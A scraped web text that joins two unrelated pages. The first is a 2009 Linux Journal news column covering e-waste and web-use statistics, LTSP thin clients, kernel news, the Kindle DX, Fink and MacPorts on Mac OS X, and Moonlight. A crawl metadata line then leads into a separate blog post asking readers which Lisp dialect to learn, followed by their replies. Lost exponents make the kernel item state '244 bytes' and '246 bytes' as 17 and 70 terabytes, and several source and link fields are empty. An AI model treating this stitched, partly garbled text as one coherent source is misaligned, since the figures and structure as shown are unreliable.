How does the program know there is a connection. | http://www.dreamincode.net/forums/topic/312090-quick-find-algorithm-explanation-needed/page__pid__1801865__st__0 | CC-MAIN-2017-39 | refinedweb | 129 | 80.82 |
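For readers puzzling over the same question: the id[] array maps each element to a set identifier, and a pair produces output only when the two identifiers differ. A small trace, sketched in Python rather than C++ (the function name is mine):

```python
def quick_find_connect(ids, p, q):
    """Union p and q in a quick-find structure.
    Returns True if a new connection was recorded, False if already connected."""
    t = ids[p]
    if t == ids[q]:
        return False                 # same identifier: already connected
    for i in range(len(ids)):
        if ids[i] == t:              # relabel p's whole set to q's identifier
            ids[i] = ids[q]
    return True

ids = list(range(10))                # each element starts in its own set
print(quick_find_connect(ids, 2, 9), ids)   # True:  id[2] becomes 9
print(quick_find_connect(ids, 2, 5), ids)   # True:  2 and 9 both become 5
print(quick_find_connect(ids, 5, 9))        # False: 5 and 9 share identifier 5
```

After connecting 2-9 and 2-5, elements 2, 9 and 5 all carry the same identifier, so entering 5 and 9 finds id[5] == id[9] and prints nothing.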
28 December 2011 05:13 [Source: ICIS news]
SHANGHAI (ICIS)--
The company is expected to start building the first phase of the project, which will have a capacity of 1,250 tonnes/year, in early 2012 and complete it by 2014, the source said.
The construction of the second phase, which will have a capacity of 2,500 tonnes/year, will be started after the company has started operating the first phase, the source added.
Shaanxi Tianhong will invest a total of yuan (CNY) 3.7bn ($585m) on the project, the source added.
The producer on 19 December signed an agreement with Centrotherm Photovoltaics for the German polysilicon major to supply the key equipment to the new project, according to a statement from Centrotherm.
($1 = CNY6 | http://www.icis.com/Articles/2011/12/28/9519304/chinas-shaanxi-tianhong-to-build-polysilicon-project-in.html | CC-MAIN-2014-52 | refinedweb | 128 | 68.1 |
This cheat sheet aims to get you up and running with the PCA9532, a 16-bit I2C I/O expander designed for controlling LEDs, which is included on the baseboard from Embedded Artists.
To do this, we'll be looking in more detail at:
The PCA9532 is an IC that is designed for controlling 16 LEDs over an I2C bus, and it includes the logic to act as an I2C slave device as well as the drive capability for directly driving LEDs.
As well as being able to switch each of the LEDs on and off independently, the PCA9532 also has two fully programmable PWM controllers that can be used to control one or more of the LEDs. Each PWM channel has a programmable blink rate ranging from 0.6 Hz to 152 Hz, and a programmable duty cycle from 0-100%. This means the LEDs can be set to blink steadily and visibly, or dimmed.
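As a rough illustration of how those rate and duty-cycle ranges map onto the chip's 8-bit registers: per the PCA9532 datasheet, the blink period is (PSC + 1) / 152 seconds and the duty cycle is PWM / 256, which is consistent with the 0.6 Hz to 152 Hz range quoted above. The helper below is a sketch of mine, not part of the mbed library:

```python
def pca9532_regs(period_s, duty):
    """Compute PCA9532 PSC (prescaler) and PWM (duty) register values.
    Datasheet formulas: period = (PSC + 1) / 152 s, duty = PWM / 256."""
    psc = round(period_s * 152) - 1
    pwm = round(duty * 256)
    if not 0 <= psc <= 255:
        raise ValueError("period out of range (~6.6 ms to ~1.68 s)")
    return psc, min(pwm, 255)

print(pca9532_regs(1.0, 0.5))    # 1 s blink period at 50% duty -> (151, 128)
```

With PSC at its maximum of 255 the period is 256/152 ≈ 1.68 s, i.e. roughly the 0.6 Hz lower bound mentioned above.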
The PCA9532 device is well documented on the NXP website, which gives links to where to buy it, data sheets and so on.
The PCA9532 is fitted to the Embedded Artists board, and connected to a bank of 8 red LEDs on pins 0-7, and a bank of 8 green LEDs on pins 8-15. The pull-up resistors required by the I2C bus are already fitted, and the three additional address bits provided by the PCA9532 are all set to 0.
For this we'll be using the library for the PCA9532. There are two published items for the PCA9532:
Our first simple test is to simply toggle the LEDs on and off. The library defines the modes as :
Our first experiment will use the SetMode function that sets all LEDs
This simple example will blink the LEDs on and off using the API for the PCA9532
The program can be imported here EA_PCA9532_HelloWorld
#include "mbed.h"
#include "PCA9532.h"

PCA9532 leds (p28, p27, 0xc0);

int main() {
    // Set LED15 to blink using PWM channel 1
    leds.Period(1, 0.1);
    leds.Duty(1, 0.5);
    leds.SetLed(15, MODE_PWM1);

    // LED0-14 will fade up in turn, the reset
    while (1) {
        // 0x7FFF enables LED 0-14,
        // which are being switched off
        leds.SetMode(0x7fff, MODE_OFF);

        // For each LED in turn
        for (int i = 0 ; i < 15 ; i++) {
            // Switch PWM to off, and connect LED(i)
            leds.Duty(0, 0.0);
            leds.SetLed(i, MODE_PWM0);

            // Fade LED(i) from 0 to 1.0
            for (float j = 0.0 ; j < 1.0 ; j += 0.01) {
                leds.Duty(0, j);
                wait(0.005);
            }

            // Set LED(i) to continuously ON
            // this stops it fading out with LED(i+1)
            leds.SetLed(i, MODE_ON);
            wait (0.01);
        }
    } // while(1)
} // main
This example program can be imported from here EA_PCA9532_Example
And also the other INOI 2017 problem.
Is there a judge where I can test my solution for this problem?
Ok. Maybe it will be 10 then.
Will it be that low? How many people are selected for the next level though?
Here's my solution:
#include <iostream>
#include <iomanip>
#include <cmath>
#include <string>
#include <algorithm>
#include <list>
#include <map>
#include <queue>
#include <set>
#include <stack>
#include <utility>
#include <vector>
using namespace std;

int diff(int length, int i, int d) {
    if (d <= i) return i - d;
Woops! Made a lot of sillies!
Why would you 'learn' that? Implementing it once as a practice is good. But then use the STL, why reinvent the wheel.. unless you wanna add some bits of your own.
I'm getting a WA in a single test case here. Could someone please help me solve that case? Here's the link to my last solution.
Please keep a mathematics problem like ISTA2001 in the coming ICO Prep Competitions. I really liked it. :) | https://www.commonlounge.com/profile/a5f549bfe2ed4c489f371e8c09ab5c7a | CC-MAIN-2020-10 | refinedweb | 175 | 78.96 |
“Roma225 Campaign” and “The Evolution of Aggah: From Roma225 to the RG Campaign” reports.
But, despite the very similar infection chain, this latest attack revealed a curious variation of the final payload, opening up different interpretations and hypotheses about the “Aggah” activities.
Technical Analysis
Table 1. Sample’s information
As in most infections, the multi-stage chain starts with a weaponized Office document containing VBA macro code. It immediately appears obfuscated and after a de-obfuscation phase, we discovered it invokes the following OS command:
mshta.exe[.ly/8hsshjahassahsh
The bit.ly link redirects on the attacker’s page hosted on Blogspot at hxxps://myownteammana.blogspot[.com/p/otuego4thday.html. This is the typical Aggah modus operandi. In fact, the webpage source code contains a JavaScript snippet designed to be executed by the MSHTA engine.
This script is obfuscated using a combination of URL-encoding and string reversing. Once again, the script is only a dropper that downloads the next malicious stage hosted on PasteBin. Like the previous Aggah campaigns, the pastes were created by the “hagga” account. This stage is designed to kill the Office suite processes and to create a new registry key to achieve persistence on the target system. This way the hagga dropper would survive the reboot.
In detail, the malware uses three mechanisms to ensure its persistence on the victim machine:
- the creation of a new task called “Windows Update” that triggers every 60 minutes;
- the creation of another task called “Update” that triggers every 300 minutes;
- the setting of “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate” registry key;
Each entry contacts pastebin.com to download and execute a further payload. The interesting fact is that the URLs referred to by the tasks and the registry key differ from each other, so the attacker is able to deliver more than one payload by just changing one of the pastes.
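As an illustration only (the Pastebin URLs below are hypothetical placeholders, and this is a sketch of mine, not the report's tooling), a triage script could flag scheduled-task entries whose action pulls a payload from Pastebin via mshta:

```python
def flags_pastebin(command):
    """Flag persistence entries whose action pulls a payload from pastebin."""
    return "mshta" in command.lower() and "pastebin.com" in command.lower()

entries = [
    'schtasks /create /sc MINUTE /mo 60 /tn "Windows Update" '
    '/tr "mshta.exe https://pastebin.com/raw/XXXX" /F',   # hypothetical URL
    'schtasks /create /sc MINUTE /mo 300 /tn "Update" '
    '/tr "mshta.exe https://pastebin.com/raw/YYYY" /F',   # hypothetical URL
    'schtasks /create /tn "Backup" /tr "C:\\backup.bat" /F',
]
print([flags_pastebin(e) for e in entries])   # [True, True, False]
```

The same check applies to the value of the AvastUpdate Run key listed in the indicators below.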
During the analysis, all three URLs pointed to the same script, which is reported in the following screen. The cleaned code reveals a byte array composing PowerShell commands. It downloads two other snippets from Pastebin.
The first one corresponds to the “Hackitup” DLL file, discussed in our previous report. The second paste is the final payload. In many other Aggah campaigns it corresponds to RevengeRAT, which could also be linked to the Gorgon Group. However, during the analysis we identified another kind of final stage.
The AzoRult Payload
Table 3. Sample’s information
This time, the final payload was a variant of a popular infostealer for sale on the dark markets, AzoRult. It is able to access the saved credentials of the major browsers, such as Chromium, Firefox, Opera and Vivaldi, to exfiltrate cookies, credentials and other navigation data.
Taking a deeper look at the command and control infrastructure, we noticed some interesting details. In fact, we discovered a particular, customized AzoRult 3.2 fork called “Mana Tools”. At the same time, reviewing the infection chain data revealed a reference to this “Mana” customization even in the Blogspot page abused in the first steps of the chain.
Conclusion
We monitored the campaign and its final payload for several days and found that the attacker delivered AzoRult samples only a few times, during the first days of September 2019; after that, it resumed delivering RevengeRAT samples.
The “Mana” campaign opens up a series of hypotheses about the threat actor behind it. According to Palo Alto Networks, the “Aggah” infection chain could have been used by GorgonGroup too, but with a different payload. So, it is possible that Gorgon added this particular AzoRult version to their arsenal, maybe to retrieve initial information about victims or to increase their recon capabilities. But the confidence in this scenario is not high enough to confirm it. Another possibility is that another minor cyber criminal leveraged the Aggah infection chain to deliver his AzoRult payload, which is a commodity malware, or that the actors behind the “Hagga” Pastebin account used their own infection chain to conduct their own attack campaign. Many questions only further hunting could answer.
Indicator of Compromise
- Hashes
- 7f649548b24721e1a0cff2dafb7269741ff18b94274ac827ba86e6a696e9de87
- 84833991f1705a01a11149c9d037c8379a9c2d463dc30a2fec27bfa52d218fa6
- 37086a162bebaecba466b3706acea19578d99afd2adf1492a074536aa7c742c1
- c2d594e23480215c94dc7f79cf50af3b3b4270fa3a60aea81f877bd787a684a4
- a318ce12ddd1b512c1f9ab1280dc25a254d2a1913e021ae34439de9163354243
- cfd1363ce16156e55460b29bf4d62045ebcd5180af50d732c2353daf12618c18
- Persistence
- schtasks /create /sc MINUTE /mo 60 /tn Windows Update /tr mshta.exe /F
- schtasks /create /sc MINUTE /mo 300 /tn ""Update"" /tr mshta.exe /F
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate
- C2
- hxxp://170.130.205.86/index.php
Yara Rules
import "pe"

rule Mana_Aggah_campaign_excel_dropper_Sep_2019 {
    meta:
        description = "Yara Rule for Mana campaign Excel dropper"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019-09-18"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = {64 68 61 73 6A 00 6B 68 64 61 6B 6A 73 68 00 64 6B 61 28 29}
        $a2 = {61 70 74 77 4D 71 55 45 27}
    condition:
        all of them
}

rule Mana_Aggah_campaign_injector_Sep_2019 {
    meta:
        description = "Yara Rule for Mana campaign DLL injector"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019-09-18"*)
}

rule Mana_Aggah_campaign_AzoRult_Sep_2019 {
    meta:
        description = "Yara Rule for Mana campaign AzoRult sample"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019-09-18"
        tlp = "white"
        category = "informational"
    strings:
        $h1 = {4D 5A 50}
        $bob1 = {55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8}
        $bob2 = {55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8}
        $bob3 = {55 8B EC 83 C4 F0 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 ?? ?? ?? ?? E8}
        $s1 = "SOFTWARE\\Borland\\Delphi\\RTL" ascii wide
        $s2 = "moz_historyvisits.visit_date" ascii wide
        $s3 = "\\BitcoinCore_custom\\wallet.dat" ascii wide
    condition:
        $h1 and all of ($s*) and 1 of ($bob*)
}
This blog post was authored by Antonio Farina and Luca Mella of Cybaze-Yoroi Z-LAB | https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/ | CC-MAIN-2021-43 | refinedweb | 933 | 53.61 |
Q 1 - Hbase is what type of database?
Hbase is a schemaless database, as it stores data in column families, which do not have a fixed or rigid structure to follow.
Q 2 - While reading data from Hbase the command used to get only a specific column instead of all the columns in a column family is
The addcolumn() command displays results only for the specific column given as input, rather than for all the columns in a table, which is the default behavior.
Q 3 - The command which allows you to change an integer value stored in Hbase cell without reading it first is
A - Incrementcolumnvalue()
The incrementColumnValue() command increments the value stored in an Hbase cell without reading it first.
Q 4 - When a region becomes bigger in size, it
B - Spills into new machines
D - Is split into smaller regions
The region gets split into smaller regions when it grows bigger in size.
Q 5 - The number of namespaces, HDFS provides to the regionservers of a Hbase database is
A - Equal to number of regionserver
B - Half of the number of regionserver
C - Double the number of regionserver
HDFS provides a single namespace to all the RegionServers, and any of them can access the persisted files from any other RegionServer.
Q 6 - In the pseudo-distributed mode, Hbase runs on
C - Either local file system or HDFS
In pseudo-distributed mode, Hbase can run on either the local file system or HDFS, but not both.
Q 7 - 8 - A coprocessor is executed when an event occurs. This type of coprocessor is known as
The observer type of coprocessor is executed when an event occurs.
Q 9 - The Hfile contains variable number of blocks. One fixed blocks in it is the block named file info block and the other one is
In an Hfile, only the file info and trailer blocks are fixed. All others are optional.
Q 10 - In Hbase there are two situations when the WAL logfiles needs to be replayed. One is when the server fails. The other is when
The only two instances when the logs are replayed are when the cluster starts or the server fails.
On Wed, Aug 9, 2017 at 6:26 PM, John Stultz <john.stu...@linaro.org> wrote:
> On Wed, Aug 9, 2017 at 5:36 PM, Wei Wang <wei...@google.com> wrote:
>> On Wed, Aug 9, 2017 at 4:44 PM, John Stultz <john.stu...@linaro.org> wrote:
>>> On Wed, Aug 9, 2017 at 4:34 PM, Cong Wang <xiyou.wangc...@gmail.com> wrote:
>>>> (Cc'ing Wei whose commit was blamed)
>>>>
>>>> On Mon, Aug 7, 2017 at 2:15 PM, John Stultz <john.stu...@linaro.org> wrote:
>>>>> On Mon, Aug 7, 2017 at 2:05 PM, John Stultz <john.stu...@linaro.org> wrote:
>>>>>> So, with recent testing with my HiKey board, I've been noticing some
>>>>>> quirky behavior with my USB eth adapter.
>>>>>>
>>>>>> Basically, pluging the usb eth adapter in and then removing it, when
>>>>>> plugging it back in I often find that its not detected, and the system
>>>>>> slowly spits out the following message over and over:
>>>>>> unregister_netdevice: waiting for eth0 to become free. Usage count = 1
>>>>>
>>>>> The other bit is that after this starts printing, the board will no
>>>>> longer reboot (it hangs continuing to occasionally print the above
>>>>> message), and I have to manually reset the device.
>>>>>
>>>> So this warning is not temporarily shown but lasts until a reboot,
>>>> right? If so it is a dst refcnt leak.
>>>
>>> Correct, once I get into the state it lasts until a reboot.
>>>
>>>> How reproducible is it for you? From my reading, it seems always
>>>> reproduced when you unplug and plug your usb eth interface?
>>>> Is there anything else involved? For example, network namespace.
>>>
>>> So with 4.13-rc3/4 I seem to trigger it easily, often with the first
>>> unplug of the USB eth adapter.
>>>
>>> But as I get back closer to 4.12, it seemingly becomes harder to
>>> trigger, but sometimes still happens.
>>>
>>> So far, I've not been able to trigger it with 4.12.
>>>
>>> I don't think network namespaces are involved? Though its out of my
>>> area, so AOSP may be using them these days.
>>> Is there a simple way to check?
>>>
>>> I'll also do another bisection to see if the bad point moves back any
>>> further.
>
> So I went through another bisection around and got 9514528d92d4 ipv6:
> call dst_dev_put() properly as the first bad commit again.
>
>> If you see the problem starts to happen on commit
>> 9514528d92d4cbe086499322370155ed69f5d06c, could you try reverting all
>> the following commits:
>> (from new to old)
>> 1eb04e7c9e63 net: reorder all the dst flags
>> a4c2fd7f7891 net: remove DST_NOCACHE flag
>> b2a9c0ed75a3 net: remove DST_NOGC flag
>> 5b7c9a8ff828 net: remove dst gc related code
>> db916649b5dd ipv6: get rid of icmp6 dst garbage collector
>> 587fea741134 ipv6: mark DST_NOGC and remove the operation of dst_free()
>> ad65a2f05695 ipv6: call dst_hold_safe() properly
>> 9514528d92d4 ipv6: call dst_dev_put() properly
>
> And reverting this set off of 4.13-rc4 seems to make the issue go away.
>
> Is there anything I can test to help narrow down the specific problem
> with that patchset?
Thanks John for confirming. Let me spend some time on the commits and I will let you know if I have some debug image for you to try.

Wei

> thanks
> -john
perl5 - Use a Perl 5 group of modules/features
Use a version of Perl and its feature set:
use perl5;        # Same as 'use perl5 v5.10.0;'
use perl5 v14.1;
use perl5 14.1;
use perl5-14.1;
Use a bundled feature set from a perl5 plugin:
use perl5-i;
use perl5-2i;
use perl5-modern;
use perl5-yourShinyPlugin;
Or both:
use perl5 v14.1 -shiny;
The perl5 module lets you use a well known set of modules in one command. It allows people to create plugins like perl5::foo and perl5::bar that are sets of useful modules that have been tested together and are known to create joy. This module, perl5, is generally the base class to such a plugin.
This:
use perl5-foo;
Is equivalent in Perl to:
use perl5 '-foo';
The perl5 module takes the first argument in the use command, and uses it to find a plugin, like perl5::foo in this case.
perl5::foo is typically just a subclass of perl5. It invokes a set of modules for its caller.
If you use it with a version, like this:
use perl5 v14;
It is the same as saying:
use v5.14;
use strict;
use warnings;
use feature ':5.14';
If you use perl5 with no arguments, like this:
use perl5;
It is the same as saying:
use perl5 v10;
This module uses lexically-wrapped-goto-chaining-magic to correctly load a set of modules (including optional version requirements and import options) into the user's code. The API for specifying a perl5 plugin is very simple.
To create a plugin called perl5::foo that gets called like this:
use perl5-foo;
Write some code like this:
package perl5::foo;
use base 'perl5';

our $VERSION = 0.12;

# This is the list of modules (with optional version and arguments)
sub imports {
    return (
        strict =>
        warnings =>
        features => [':5.10'],
        SomeModule => 0.22,
        OtherModule => 0.33, [option1 => 2],
        Module => [], # Don't invoke Module's import() method
    );
}

1;
This module was inspired by Michael Schwern's perl5i, and the talk he gave about it at the 2010 OSDC in Melbourne. By "inspired" I mean that I was perturbed by Schwern's non-TMTOWTDI attitude towards choosing a standard set of Perl modules for all of us.
THIS IS PERL! THERE ARE NO STANDARDS!
...and I told him so. I also promised that I would show him my feelings in code. Schwern, this is how I feel! (See also: perl5::i)
Special thanks to schwern, mstrout, audreyt, rodrigo and jesse for ideas and support.
Ingy döt Net <ingy@cpan.org>
This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
See | http://search.cpan.org/~ingy/perl5/lib/perl5.pod | CC-MAIN-2016-30 | refinedweb | 451 | 65.52 |
Red Hat Bugzilla – Bug 213385
Monodevelop does not compile glade projects
Last modified: 2007-11-30 17:11:47 EST
Description of problem:
I cannot compile Glade2 C# projects, when i try to compile a new "fresh" glade2
project monodevelop returned me errors:
--------------------------------------
The type or namespace name `Gtk' could not be found. Are you missing a using
directive or an assembly reference?(CS0246)
........
The type or namespace name `Glade' could not be found. Are you missing a using
directive or an assembly reference?(CS0246)
.....
------------------------------------
If i go on "reference->edit reference", on packages panel i cannot see gtk-sharp
or glade-sharp, but they are installed correctly on mono! because if i compile
externally by command line, the program run fine.
I had this problem also in FC5, and i resolved exporting PKG_CONFIG_PATH in this
way:
export PKG_CONFIG_PATH=/usr/lib/pkgconfig:/usr/lib64/pkgconfig:/usr/share/pkgconfig
but this has no effects on FC6.
I attach the screenshot of the errors.
Version-Release number of selected component (if applicable):
FC6 x86_64
monodevelop 0.12
How reproducible: always
Steps to Reproduce:
1. Create new project C#->glade2.0
2. Try to build the project
3.
Actual results:
SOme error on missing libraries
Expected results:
Building of project
Additional info:
Created attachment 139949 [details]
Screenshot of the error and the reference panel
Odd. I've just fired up monodevelop, created a new Glade2 project and hit F8 to
build the project and there wasn't a problem.
Could you go to the command line and type
rpm -qa gtk-sharp*
and let me know what you're seeing. It is possible that as FC is using multiple
libs now on 64 bit platforms that you're getting some form of conflict that you
shouldn't (it's happened at this end - I solved it by hosing all the the i386
packages)
That said, it's equally possible that I've screwed up somewhere!
[root@localhost seby]# rpm -qa gtk-sharp*
gtk-sharp2-2.10.0-3.fc6
gtk-sharp-1.0.10-12.fc6
Okay, I think I know what the problem is now - as a confirmer, can you type
su
yum -y install gtk-sharp*
and try and run it - I have a feeling I need to change the spec file so that the
-gapi and -devel files are requires.
PERFECT!!! IT RUN!!
thank you so much
Excellent - I thought it would. Out of interest, have you got the
monodevelop-devel package installed?
No, i don't have installed monodevelop-devel
[ Note that the same problem is also on FC5 ;-) ]
Thanks, I was just making sure before I do a build. | https://bugzilla.redhat.com/show_bug.cgi?id=213385 | CC-MAIN-2017-09 | refinedweb | 441 | 60.95 |
Originally posted by Hima Mangal:

hi all.. pls have a look at the following code.. What will this program print out ?

class Base {
    int value = 0;
    Base() {
        addValue();
    }
    void addValue() {
        value += 10;
    }
    int getValue() {
        return value;
    }
}

class Derived extends Base {
    Derived() {
        addValue();
    }
    void addValue() {
        value += 20;
    }
}

public class Test {
    public static void main(String[] args) {
        Base b = new Derived();
        System.out.println(b.getValue());
    }
}

1. 10
2. 20
3. 30
4. 40

the correct answer is 40.. how is this so.. shouldn't the method in the base class constructor call its own addValue() method?? also, if the methods are declared static, the output is 30.. aren't static methods resolved by the type or reference and not by the type of object??

Thanx in advance..
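The behavior the thread asks about, a base-class constructor dispatching to the derived override, is not unique to Java. The same experiment can be reproduced in Python:

```python
class Base:
    def __init__(self):
        self.value = 0
        self.add_value()          # dispatches to the *derived* override

    def add_value(self):
        self.value += 10

class Derived(Base):
    def __init__(self):
        super().__init__()        # Base.__init__ runs, calling Derived.add_value
        self.add_value()          # then the derived constructor adds again

    def add_value(self):
        self.value += 20

print(Derived().value)            # 40, matching the Java example
```

Instance method calls are resolved against the object's actual class even while a base constructor is running, so Base() contributes 20 (the override) and Derived() another 20. Static methods, by contrast, are resolved at compile time against the class in whose code the call appears, which is why the static variant yields 30.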
(a small change added that simplifies the SmallVEControl class definition)
With the release of NAV 2009 SP1 CTP2 (to MVPs, TAP and BAP) and the official release of the statement of Direction, I can now write about the last part of the integration to Virtual Earth.
People who hasn’t access to NAV 2009 SP1, will unfortunately have to wait until the official release until they can take advantage of this post.
Please not that you should read Part 1, Part 2 and Part 3 of the Integration to Virtual Earth – and you would have to have the changes to the app. described in these posts in order to make this work.
This post will take advantage of a functionality, which comes in NAV 2009 SP1 called Extensibility. Christian explains some basics about extensibility in a post, which you can find here.
The Goal
As you can see on the above picture, we have a control, which is able to show the map in NAV of the customer location, and as you select different customers in the list, the map changes.
The changes in the map happens without any user interference, so that the user can walk up and down in the list without being irritated. In the Actions menu in the part, we will put an action called Open In Browser, which will open up a map in a browser as explained in part 3.
Note that the Weather factbox is not shown here.
What is it?
The Control inside the Customer Map Factbox is basically just a browser control, in which we set a html document (pretty much like the one described in part 3) and leave it to the browser control to connect to Virtual Earth and retrieve the map. I do not connect to web services from the browser control, instead we transfer parameters of the current customer location to the control.
Although the internal implementation is a browser control, we don’t do html in NAV and we don’t give the control any URL’s or other fancy stuff. The way we make this work is to have the control databind to a Text variable (CustomerLocation), which gets set in OnAfterGetRecord:
CustomerLocation := 'latitude='+FORMAT(Latitude,0,9)+'&longitude='+FORMAT(Longitude,0,9)+'&zoom=15';
The factbox isn’t able to return any value and there isn’t any reason right now to trigger any events from the control.
So now we just need to create a control, which shows the string “latitude=50&longitude=2&zoom=15” differently than a dumb text.
How is the control build?
Let’s just go through the creation of the VEControl step by step.
1. Start Visual Studio 2008 SP1, create a new project of type Class Library and call it VEControl.
2. Add a reference System.Windows.Forms , System.Drawing and to the file C:\Program Files\Microsoft Dynamics NAV\60\RoleTailored Client\Microsoft.Dynamics.Framework.UI.Extensibility.dll – you need to browse and find it. Note that when you copy the VEControl.dll to it’s final location you don’t need to copy this DLL, since it will be loaded into memory from the Client before your DLL is called.
3. Open Project Properties, go to the Signing tab, and sign your DLL with a new key.
4. In the Build Events Tab add the following command to the Post-Build Event window:
copy VEControl.dll "C:\Program Files\Microsoft Dynamics NAV\60\RoleTailored Client\Add-ins"
this ensures that the Control gets installed in the right directory.
5. Delete the automatically generated class1.cs and add another class file called VEControl.cs
6. Add the following class to the file:
/// <summary>
/// Native WinForms Control for Virtual Earth Integration
/// </summary>
public class VEControl : WebBrowser
{
private string template;
private string text;
private string html = "<html><body></body></html>";
/// <summary>
/// Constructor for Virtual Earth Integration Control
/// </summary>
/// <param name="template">HTML template for Map content</param>
public VEControl(string template)
{
this.template = template;
this.DocumentCompleted += new WebBrowserDocumentCompletedEventHandler(VEControl_DocumentCompleted);
}
/// <summary>
///
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
void VEControl_DocumentCompleted(object sender, WebBrowserDocumentCompletedEventArgs e)
{
if (this.DocumentText != this.html)
{
this.DocumentText = this.html;
}
}
/// <summary>
/// Property for Data Binding
/// </summary>
public override string Text
{
get
{
return text;
}
set
{
if (text != value)
{
text = value;
if (string.IsNullOrEmpty(value))
{
html = "<html><body></body></html>";
}
else
{
html = this.template;
html = html.Replace("%latitude%", GetParameter("latitude", "0"));
html = html.Replace("%longitude%", GetParameter("longitude", "0"));
html = html.Replace("%zoom%", GetParameter("zoom", "1"));
}
this.DocumentText = html;
}
}
}
/// <summary>
/// Get Parameter from databinding
/// </summary>
/// <param name="parm">Parameter name</param>
/// <param name="defaultvalue">Default Value if the parameter isn’t specified</param>
/// <returns>The value of the parameter (or default)</returns>
private string GetParameter(string parm, string defaultvalue)
{
foreach (string parameter in text.Split('&'))
{
if (parameter.StartsWith(parm + "="))
{
return parameter.Substring(parm.Length + 1);
}
}
return defaultvalue;
}
}
Note, that you will need a using statement to System.Windows.Forms.
This class gets initialized with a html template (our javascript code) and is able to get values like “latitude=50&longitude=2&zoom=15” set as the Text property and based on this render the right map through the template.
The reason for the DocumentCompleted event handler is, that if we try to set the DocumentText property in the browser before it is done rendering the prior DocumentText, it will just ignore the new value. We handle this by hooking up to the event and if the DocumentText is different from the value we have – then this must have happened and we just set it again. We are actually pretty happy that the control works this way, because the javascript is run in a different thread than our main thread and fetching the map control from Virtual Earth etc. will not cause any delays for us.
Now this is just a standard WinForms Control – how do we tell the Client that this is a control, that it can use inside the NAV Client?
The way we chose to implement this is by creating a wrapper, which is the one we register with the NAV Client and this wrapper is responsible for creating the “real” control. This allows us to use 3rd party controls even if they are sealed and/or we don’t have the source for them.
7. Add a html page called SmallVEMap.htm and add the following content
<html>
<head>
<title></title>
<meta http-
<script type="text/javascript" src=""></script>
<script type="text/javascript">
var map = null;
var shape = null;
function GetMap() {
map = new VEMap('myMap');
var latitude = parseFloat("%latitude%");
var longitude = parseFloat("%longitude%");
var zoom = parseInt("%zoom%");
map.SetDashboardSize(VEDashboardSize.Tiny);
var position = new VELatLong(latitude, longitude);
map.LoadMap(position, zoom, 'r', false);
shape = new VEShape(VEShapeType.Pushpin, position);
map.AddShape(shape);
}
</script>
</head>
<body onload="GetMap();" style="margin:0; position:absolute; width:100%; height:100%; overflow: hidden">
<div id='myMap' style="position: absolute; width:100%; height:100%"></div>
</body>
</html>
8. Add a Resource file to the project called Resources.resx, open it and drag the SmallVEMap.htm into the resources file.
9. Add a class called SmallVEControl.cs and add the following classes
[ControlAddInExport("SmallVEControl")]
public class SmallVEControl : StringControlAddInBase, IStringControlAddInDefinition
{
protected override Control CreateControl()
{
var control = new VEControl(Resources.SmallVEMap);
control.MinimumSize = new Size(200, 200);
control.MaximumSize = new Size(500, 500);
control.ScrollBarsEnabled = false;
control.ScriptErrorsSuppressed = true;
control.WebBrowserShortcutsEnabled = false;
return control;
}
public override bool AllowCaptionControl
{
get
{
return false;
}
}
}
You need to add using statements to System.Drawing, Microsoft.Dynamics.Framework.UI.Extensibility, Microsoft.Dynamics.Framework.UI.Extensibility.WinForms and System.Windows.Forms.
The CreateControl is the method called by the NAV Client when it needs to create the actual winforms control. We override this method and create the VEControl and give it the html template.
The reason for overriding the AllowCaptionControl is to specify that our control will not need a caption (else the NAV Client will add a caption control in front of our control).
There are various other methods that can be overridden, but we will touch upon these when needed.
Build your solution and you should now have a VEControl.DLL in the Add-Ins directory under the RoleTailored Client.
And how do I put this control into use in the NAV Client?
First of all we need to tell the Client that the control is there!
We do that by adding an entry to the Client Add-In table (2000000069). You need to specify Control Add-In Name (which would be the name specified in the ControlAddInExport attribute above = SmallVEControl) and the public key token.
But what is the public key token?
Its is the public part of the key-file used to sign the assembly and as you remember, we just asked Visual Studio to create a new key-file so we need to query the key file for it’s public key and we do that by running
sn –T VEControl.snk
in a Visual Studio command prompt.
Note that this public key is NOT the one you need to use, unless you download my solution below.
Having the Control Registered for usage we need to create a new page and call it Customer Map Factbox. This page has SourceTable set to the Customer table and is contains one control, bound to a variable called CustomerLocation, which gets set in the OnAfterGetRecord.
The code in OnAfterGetRecord is
CustomerLocation := 'latitude='+FORMAT(Latitude,0,9)+'&longitude='+FORMAT(Longitude,0,9)+'&zoom=15';
The Customer Map Factbox is added as a part to the Customer Card and the Customer List and the SubFormLink is set to No.=FIELD(No.)
That’s it guys – I realize this is a little rough start on extensibility – I promise that there will be other and more entry level starter examples on extensibility – I just decided to create an end-to-end sample to show how to leverage the Virtual Earth functionality in a Factbox.
As usual you can download the visual studio project here.
Enjoy
Freddy Kristiansen
PM Architect
Microsoft Dynamics NAV
thank you SO much!
Since yesterday I am working on how the Microsoft.Dynamics.Framework.UI.Extensibility is working in CTP2 🙁
it seems like that you use CTP2 because
I see you do not call ControlAddinDefinition wich was needed in CTP1? I am right?
Do you have some tipps for me what is the fastest way to get your solution working?
I will also use it on Thursday where I have a presentation for MS AT at a launch event.
Thanks,
Rene Gayer
(MVP)
Correct this is a CTP2 solution, which has the extensibility API which will ship in SP1.
I didn’t want to post anything using the CTP1 API, since this was going to change.
If you download the solution above – you should be able to compile it and make it work pretty easily with CTP2.
If you want to make it work with CTP1 – you would have to change the base classes and the attribute as you are referring to (I think).
hi, yes I am already download it an compiled it with CTP2.Thank you once again!
Rene | https://blogs.msdn.microsoft.com/freddyk/2009/06/07/integration-to-virtual-earth-part-4-out-of-4/ | CC-MAIN-2018-34 | refinedweb | 1,853 | 54.52 |
UpFront
UpFront
- LJ Index, September 2009
- Why Buy a $350 Thin Client?
- diff -u: What's New in Kernel Development
- Hardware Requirements: None
